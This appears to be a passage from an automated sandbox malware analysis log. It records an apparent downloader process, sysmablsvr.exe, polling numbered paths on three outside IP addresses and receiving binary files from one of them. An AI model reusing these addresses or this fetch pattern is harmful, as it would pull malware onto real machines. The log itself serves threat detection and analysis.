                                            Sep 17, 2024 23:11:44.771183968 CEST272INData Raw: 77 20 d2 e9 82 47 d2 8b 5b 97 b7 13 32 50 05 5d 45 c8 e0 9b c9 8b a1 81 00 cd 52 85 bf 48 a6 1b 71 93 08 d9 03 75 f4 46 fb 9e 9b 65 be 8b cb 7a c2 af f4 63 97 2e d3 c2 7e ae db 52 b1 a7 89 1f e7 85 81 7e 86 de 2c e8 fd a8 94 57 a3 05 25 33 f6 c6
                                            Data Ascii: w G[2P]ERHquFezc.~R~,W%36NgQ2~a8GI9708qARgsjUcoB\3h9aF3m:*1\g1<)TXBK!DOPWuep{g@m^xu


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            39 | 192.168.2.4 | 49797 | 185.215.113.66 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:11:46.807744980 CEST | 166 | OUT | GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:47.503910065 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:47 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            40 | 192.168.2.4 | 49799 | 185.215.113.66 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:11:49.558219910 CEST | 166 | OUT | GET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:50.288872004 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:50 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            41 | 192.168.2.4 | 49800 | 185.215.113.66 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:11:52.370625019 CEST | 166 | OUT | GET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:53.080163956 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:52 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            42 | 192.168.2.4 | 49802 | 185.215.113.66 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:11:55.113538027 CEST | 166 | OUT | GET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:55.821461916 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:55 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            43 | 192.168.2.4 | 49803 | 185.215.113.66 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:11:58.061697006 CEST | 166 | OUT | GET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:58.781685114 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:58 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            44 | 192.168.2.4 | 49805 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:01.827614069 CEST | 163 | OUT | GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            45 | 192.168.2.4 | 49807 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:05.511257887 CEST | 163 | OUT | GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            46 | 192.168.2.4 | 49809 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:09.245800018 CEST | 163 | OUT | GET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            47 | 192.168.2.4 | 49810 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:12.986103058 CEST | 163 | OUT | GET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            48 | 192.168.2.4 | 49812 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:16.809278011 CEST | 163 | OUT | GET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            49 | 192.168.2.4 | 49814 | 77.91.77.92 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:20.527097940 CEST | 163 | OUT | GET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            50 | 192.168.2.4 | 49816 | 91.202.233.141 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:25.451838017 CEST | 166 | OUT | GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:26.509773016 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:26 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Sep 17, 2024 23:12:26.511990070 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:26 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes


                                            Session ID: 51 | Source IP: 192.168.2.4 | Source Port: 49817 | Destination IP: 91.202.233.141 | Destination Port: 80 | PID: 6768 | Process: C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:28.071275949 CEST | 166 | OUT | GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:28.823597908 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:28 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes


                                            Session ID: 52 | Source IP: 192.168.2.4 | Source Port: 49820 | Destination IP: 91.202.233.141 | Destination Port: 80 | PID: 6768 | Process: C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:35.284993887 CEST | 166 | OUT | GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:35.986341000 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:35 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
                                            Connection: keep-alive
                                            ETag: "66e17142-1f00"
                                            Accept-Ranges: bytes


                                            Session ID: 53 | Source IP: 192.168.2.4 | Source Port: 49821 | Destination IP: 91.202.233.141 | Destination Port: 80 | PID: 6768 | Process: C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:38.028651953 CEST | 166 | OUT | GET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:38.728172064 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:38 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID: 54 | Source IP: 192.168.2.4 | Source Port: 49823 | Destination IP: 91.202.233.141 | Destination Port: 80 | PID: 6768 | Process: C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:40.760751009 CEST | 166 | OUT | GET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:41.466754913 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:41 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID: 55 | Source IP: 192.168.2.4 | Source Port: 49825 | Destination IP: 91.202.233.141 | Destination Port: 80 | PID: 6768 | Process: C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:44.085854053 CEST | 166 | OUT | GET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:44.777846098 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:44 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID: 56 | Source IP: 192.168.2.4 | Source Port: 49826 | Destination IP: 91.202.233.141 | Destination Port: 80 | PID: 6768 | Process: C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:12:46.807213068 CEST | 166 | OUT | GET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:47.533663988 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:47 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                             Session ID:57
                                             Source:192.168.2.4:49828
                                             Destination:185.215.113.66:80
                                             PID:6768
                                             Process:C:\Windows\sysmablsvr.exe
                                             Timestamp:Sep 17, 2024 23:12:50.684051037 CEST  Bytes transferred:166  Direction:OUT
                                             GET /1 HTTP/1.1
                                             User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                             Host: 185.215.113.66
                                             Timestamp:Sep 17, 2024 23:12:51.404925108 CEST  Bytes transferred:728  Direction:IN
                                             HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:51 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
